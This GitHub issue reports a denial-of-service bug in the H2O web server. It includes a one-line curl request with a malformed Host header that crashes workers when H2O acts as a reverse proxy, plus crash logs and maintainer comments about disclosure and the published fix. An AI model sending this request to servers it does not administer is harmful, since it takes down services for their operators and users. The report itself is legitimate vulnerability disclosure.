-
Notifications
You must be signed in to change notification settings - Fork 848
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Malformed HTTP/1.1 Request Causes Out Of Memory Error Within H2O Server With HTTP Backend (Zero Day) #3228
Comments
Thanks for reporting this issue. But as someone who administers several servers with H2O, I kindly ask you to follow the procedures for (responsibly) reporting security issues. |
This was raised with the team but fell on deaf ears - responsible reporting was followed without a successful outcome. |
@ElijahGlover I am disappointed that you opened this issue without proper coordination with us (e.g, notifying us that you would disclose the issue at a certain moment). We did inform you that we know the issue, and had invited you as a collaborator for releasing the fix. FWIW we already have a fix which we will roll out pretty soon. PS. Regardless, thank you for noticing and reporting the bug. |
The issue has been fixed in #3229, a security advisory is available at GHSA-p5hj-phwj-hrvx. As stated on the advisory, we do not yet have a tagged version. Sorry for the inconvenience. |
Thank you @kazuho for jumping on this defect quickly. I understand everyone is busy and resource constrained. Private disclosure was sent to the team at the very start of April 2023 to get this dealt with without issuing a public disclosure. Unfortunately, communications stalled as there is a disconnect between H2O & Fastly SecOps teams. There are roughly 15k+ H2O servers (Shodan numbers) in the wild that are vulnerable to this issue. It's clear that there is public knowledge from attackers of this known vulnerability as whole networks are targeted using this vector. |
We have identified an issue with h2o server where malformed HTTP/1.1 requests crash the process, occasionally locking up child workers and causing a denial of service/outage dropping open connections.
The issue was first discovered in an older build of h2o server from December 2022. Compiling the latest from the master branch from March 2023 also crashes in the same way.
We are terminating TLS and proxying HTTP to Varnish using a single TCP backend.
We are able to crash H2O with a simple curl command with colons in the host header.
curl 127.0.0.1 -H "host: :"
responds with curl: (52) Empty reply from server
H2O error logs out the following:
old worker 1805 died, status:0
old worker 1816 died, status:0
fatal:/h2o/include/h2o/memory.h:443:no memory
received fatal signal 6
[1930] h2o[0x52a038]
[1930] /lib64/libpthread.so.0(+0x12cf0)[0x7f1c80aaccf0] __restore_rt at ??:?
[1930] /lib64/libc.so.6(gsignal+0x10f)[0x7f1c80722aff] ?? ??:0
[1930] /lib64/libc.so.6(abort+0x127)[0x7f1c806f5ea5] ?? ??:0
[1930] h2o[0x478dda]
[1930] h2o[0x479175]
[1930] h2o(h2o_httpclient__h1_on_connect+0x221)[0x471d01]
[1930] h2o[0x47d360]
[1930] h2o[0x47d676]
[1930] h2o(h2o_evloop_run+0x37)[0x481c87]
[1930] h2o[0x52bbb1]
[1930] /lib64/libpthread.so.0(+0x81cf)[0x7f1c80aa21cf] start_thread at ??:?
[1930] /lib64/libc.so.6(clone+0x43)[0x7f1c8070de73] ?? ??:0
Config uses very simple interface binding with one backend.
hosts:
"<INTERFACE_IP>:80":
listen: *clear_http
paths:
"/":
proxy.reverse.url: http://127.0.0.2:8080/
proxy.preserve-host: ON
We are building against the latest OpenSSL 3.1 libraries, although this doesn't look like an OpenSSL vulnerability. Looking at the codebase it looks like something to do with creating backend HTTP requests inside the event loop.
The text was updated successfully, but these errors were encountered: